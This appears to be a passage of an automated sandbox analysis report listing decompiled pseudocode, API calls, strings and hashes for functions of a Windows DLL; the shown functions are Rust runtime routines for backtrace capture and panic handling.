			E6EA8DD30(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6EA939E0;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6EA9E9D0(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6eacf8cc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6EAA9A30(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6EAA9470(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6ead06e0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6EA90D10(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6eade128, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6eade128, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6eade128, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6eacfdd8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6eacf570;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6EA82150( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6eade128, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6eacfde0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6EA9E9D0(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6EA9C5AE();
						_t217 = E6EA8E4E0(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6eade148; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6eade130, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6EAA94E0(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ead0ad0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6eade148 = _t218;
									_t267 =  *0x6eade14c; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6eade14c; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6eade158; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6EA9E9D0(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6EA8E6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6eade130, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6EA9E9D0(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6eade144; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6eade130, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6EAA94E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ead0ad0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6eade144 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6EA8E6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6eade158 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6eade130, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6EAA94E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ead0ad0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6EA8E6D0( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6eade14c = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6eade128, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6eacfe4c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6eacf570;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6EA82150( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}

0x6ea8dd33
0x6ea8dd34
0x6ea8dd35
0x6ea8dd39
0x6ea8dd3f
0x6ea8dd41
0x6ea8dd47
0x6ea8dd4d
0x6ea8dd57
0x6ea8dd71
0x6ea8dd77
0x6ea8dd7e
0x6ea8dd80
0x6ea8dd83
0x6ea8dd94
0x6ea8dd99
0x6ea8dd9c
0x6ea8dda1
0x6ea8dda6
0x6ea8ddad
0x6ea8ddb0
0x6ea8ddb7
0x6ea8ddba
0x6ea8ddc7
0x6ea8ddca
0x6ea8dde6
0x6ea8dde6
0x6ea8ddec
0x6ea8ddf0
0x6ea8ddf2
0x6ea8ddf4
0x6ea8ddfe
0x6ea8de02
0x6ea8de07
0x6ea8de0d
0x6ea8de0d
0x6ea8de10
0x6ea8de13
0x6ea8de16
0x6ea8de19
0x6ea8de1c
0x6ea8de1f
0x6ea8ddcc
0x6ea8de30
0x6ea8de30
0x6ea8de36
0x6ea8de3d
0x6ea8de3d
0x6ea8de40
0x6ea8de42
0x6ea8de4a
0x6ea8de50
0x6ea8de54
0x6ea8de62
0x6ea8ddd0
0x6ea8ddd3
0x6ea8ddd5
0x6ea8de8d
0x6ea8de90
0x6ea8de9a
0x6ea8de9c
0x6ea8e3b8
0x00000000
0x6ea8dea2
0x6ea8dea2
0x6ea8dea5
0x6ea8dea8
0x6ea8dea9
0x6ea8deae
0x6ea8deb4
0x6ea8deb9
0x6ea8debb
0x6ea8debe
0x6ea8dec3
0x6ea8dec6
0x6ea8dec8
0x00000000
0x00000000
0x6ea8deca
0x00000000
0x6ea8dec8
0x6ea8dddb
0x6ea8dddb
0x6ea8dde1
0x6ea8dde4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8dde4
0x6ea8de77
0x6ea8de7a
0x6ea8de82
0x6ea8de85
0x00000000
0x6ea8de8b
0x00000000
0x6ea8de8b
0x00000000
0x6ea8de85
0x6ea8decc
0x6ea8decc
0x6ea8ded2
0x6ea8ded4
0x6ea8ded7
0x6ea8dede
0x6ea8dee1
0x6ea8dee3
0x6ea8dee5
0x6ea8dee5
0x6ea8dee9
0x6ea8deeb
0x6ea8def0
0x6ea8defd
0x6ea8defd
0x6ea8def0
0x6ea8dee9
0x6ea8df02
0x6ea8df02
0x6ea8df04
0x6ea8df6e
0x6ea8df71
0x6ea8df74
0x6ea8df77
0x6ea8df7a
0x6ea8df06
0x6ea8df06
0x6ea8df0a
0x6ea8df0c
0x6ea8df11
0x6ea8df17
0x6ea8df22
0x6ea8df24
0x6ea8df27
0x6ea8df2a
0x6ea8df2d
0x6ea8df31
0x6ea8df33
0x6ea8df35
0x6ea8df39
0x6ea8df3b
0x6ea8df3b
0x6ea8df47
0x6ea8df4c
0x6ea8df4c
0x6ea8df58
0x6ea8df58
0x6ea8df5d
0x6ea8df60
0x6ea8df62
0x6ea8df62
0x6ea8df84
0x6ea8df87
0x6ea8df8d
0x6ea8df90
0x6ea8df93
0x6ea8df9d
0x6ea8dfa7
0x6ea8dfb1
0x6ea8dfbb
0x6ea8dfc8
0x6ea8dfd1
0x6ea8dfd2
0x6ea8dfd7
0x6ea8dfda
0x6ea8dfdc
0x6ea8e255
0x6ea8e255
0x6ea8e258
0x6ea8e25a
0x6ea8e25c
0x6ea8e260
0x6ea8e26b
0x6ea8e26b
0x6ea8e260
0x6ea8e270
0x00000000
0x6ea8dfe2
0x6ea8dfe2
0x6ea8dfe8
0x6ea8dfef
0x6ea8dff3
0x6ea8dff6
0x6ea8dffd
0x6ea8dfff
0x6ea8e008
0x6ea8e00e
0x6ea8e011
0x6ea8e018
0x6ea8e01c
0x6ea8e022
0x6ea8e028
0x6ea8e02e
0x6ea8e036
0x6ea8e03f
0x6ea8e049
0x6ea8e050
0x6ea8e055
0x6ea8e058
0x6ea8e059
0x6ea8e05e
0x6ea8e063
0x6ea8e065
0x6ea8e076
0x6ea8e07c
0x6ea8e07f
0x6ea8e081
0x6ea8e09a
0x6ea8e0a0
0x6ea8e0a2
0x6ea8e3e5
0x6ea8e3fe
0x00000000
0x6ea8e0a8
0x6ea8e0a8
0x6ea8e0aa
0x6ea8e0af
0x6ea8e0b5
0x6ea8e0b7
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8e0b7
0x6ea8e083
0x6ea8e083
0x6ea8e089
0x6ea8e08b
0x6ea8e0d9
0x6ea8e0de
0x6ea8e0e1
0x6ea8e0e6
0x6ea8e0e9
0x6ea8e0ec
0x6ea8e0ee
0x6ea8e10e
0x6ea8e10e
0x6ea8e117
0x6ea8e11e
0x6ea8e12d
0x6ea8e132
0x6ea8e147
0x6ea8e14e
0x6ea8e151
0x6ea8e15b
0x6ea8e161
0x6ea8e16b
0x6ea8e175
0x6ea8e17b
0x6ea8e185
0x6ea8e190
0x6ea8e1ae
0x6ea8e1b1
0x6ea8e1b4
0x00000000
0x00000000
0x6ea8e1c6
0x6ea8e1cc
0x6ea8e1d6
0x6ea8e1db
0x6ea8e1de
0x6ea8e1e1
0x6ea8e1e3
0x00000000
0x00000000
0x00000000
0x6ea8e1e3
0x00000000
0x6ea8e0f0
0x6ea8e0fb
0x6ea8e101
0x6ea8e103
0x6ea8e2b4
0x6ea8e2b9
0x6ea8e2ce
0x6ea8e2d5
0x6ea8e2dc
0x6ea8e2e6
0x6ea8e2ed
0x6ea8e2f0
0x6ea8e2fa
0x6ea8e300
0x6ea8e30a
0x6ea8e314
0x6ea8e31a
0x6ea8e324
0x6ea8e330
0x6ea8e330
0x6ea8e336
0x6ea8e338
0x6ea8e356
0x6ea8e372
0x6ea8e374
0x6ea8e377
0x6ea8e1e5
0x6ea8e1e8
0x6ea8e1ed
0x6ea8e1f1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8e33a
0x6ea8e345
0x6ea8e34b
0x6ea8e34d
0x6ea8e3c2
0x6ea8e3db
0x00000000
0x6ea8e34f
0x6ea8e34f
0x6ea8e351
0x00000000
0x6ea8e351
0x6ea8e34d
0x00000000
0x6ea8e37d
0x6ea8e38d
0x6ea8e393
0x6ea8e39d
0x6ea8e3a2
0x6ea8e3a5
0x6ea8e3a8
0x6ea8e3a8
0x00000000
0x6ea8e109
0x6ea8e109
0x00000000
0x6ea8e109
0x6ea8e103
0x6ea8e08d
0x6ea8e0b9
0x6ea8e0c4
0x6ea8e0ca
0x6ea8e0cc
0x6ea8e408
0x6ea8e421
0x6ea8e429
0x6ea8e429
0x6ea8e430
0x6ea8e44c
0x6ea8e0d2
0x6ea8e0d2
0x6ea8e0d4
0x00000000
0x6ea8e0d4
0x6ea8e0cc
0x6ea8e08b
0x6ea8e067
0x6ea8e067
0x6ea8e06b
0x00000000
0x6ea8e071
0x6ea8e1f3
0x6ea8e1f3
0x6ea8e1f7
0x6ea8e287
0x6ea8e287
0x6ea8e28a
0x6ea8e28c
0x6ea8e28e
0x6ea8e292
0x6ea8e29d
0x6ea8e29d
0x6ea8e292
0x6ea8e2a2
0x6ea8e1fd
0x6ea8e200
0x6ea8e20a
0x6ea8e214
0x6ea8e21e
0x6ea8e228
0x6ea8e232
0x6ea8e248
0x6ea8e249
0x6ea8e251
0x6ea8e253
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8e253
0x6ea8e1f7
0x6ea8e272
0x6ea8e278
0x6ea8e286
0x6ea8e286
0x6ea8e065
0x6ea8dfdc
0x00000000

APIs

SetLastError.KERNEL32(00000000), ref: 6EA8DE42
GetCurrentDirectoryW.KERNEL32(?,?), ref: 6EA8DE4A
GetLastError.KERNEL32 ref: 6EA8DE56
GetLastError.KERNEL32 ref: 6EA8DE68
GetLastError.KERNEL32 ref: 6EA8DECC
HeapFree.KERNEL32(00000000,00000000), ref: 6EA8DEFD
HeapFree.KERNEL32(00000000,?), ref: 6EA8DF47
HeapFree.KERNEL32(00000000,?), ref: 6EA8DF58
GetCurrentProcess.KERNEL32(?), ref: 6EA8E031
GetCurrentThread.KERNEL32 ref: 6EA8E039
RtlCaptureContext.KERNEL32(?), ref: 6EA8E059
GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6EA8E09A
GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6EA8E0C4
GetCurrentProcess.KERNEL32 ref: 6EA8E0D9
GetProcAddress.KERNEL32(StackWalkEx), ref: 6EA8E0FB
ReleaseMutex.KERNEL32(?), ref: 6EA8E1E8
HeapFree.KERNEL32(00000000,?), ref: 6EA8E26B
HeapFree.KERNEL32(00000000,?,?), ref: 6EA8E29D
GetProcAddress.KERNEL32(StackWalk64), ref: 6EA8E345

Strings

StackWalk64, xrefs: 6EA8E33A
SymFunctionTableAccess64, xrefs: 6EA8E08F
StackWalkEx, xrefs: 6EA8E0F0
called `Option::unwrap()` on a `None` value, xrefs: 6EA8E3CC, 6EA8E3EF, 6EA8E412
SymGetModuleBase64, xrefs: 6EA8E0B9

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
API String ID: 1381040140-1036201984
Opcode ID: 4efeab568c1d5ba57d8d570fb07c041976a7852b99df0688bd6357552bf01778
Instruction ID: b0da0dc5093d4bddee5e5b2ad3c969b26d27d76944b81cc220fa9ee4a17f5bd4
Opcode Fuzzy Hash: 4efeab568c1d5ba57d8d570fb07c041976a7852b99df0688bd6357552bf01778
Instruction Fuzzy Hash: EF1248B0600B00DFE761CFA5C994B93BBF5BB09308F14891DE59A8B690D771B889CF55

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C700, Relevance: 32.0, APIs: 14, Strings: 4, Instructions: 477
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6EA8C700(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6EA939A0;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6eade120], esi");
				_t190 = E6EA8D000(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6EAA95A0(_t264,  &M6EACF8F7, 0x46, _t337,  &_v68, 0x6eacf870, 0x6eacf9bc);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6eacf570;
						_v120 = 0x6eacf824;
						_v68 = 0x6ead0260;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6EA82470;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6EA8D0F0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6eade128, 0, _t256);
							}
							_t194 = HeapFree( *0x6eade128, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6ead0224;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6eacf570;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t194 = E6EA8D0F0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6eade11c);
					_v144 = 0x6eade11c;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6EA8D000(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
						if( *_t194 <= 1) {
							_t195 =  *0x6eade110; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6EA8D380(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
					} else {
						E6EAA95A0(_t264,  &M6EACF8F7, 0x46, _t340,  &_v68, 0x6eacf870, 0x6eacf9bc);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
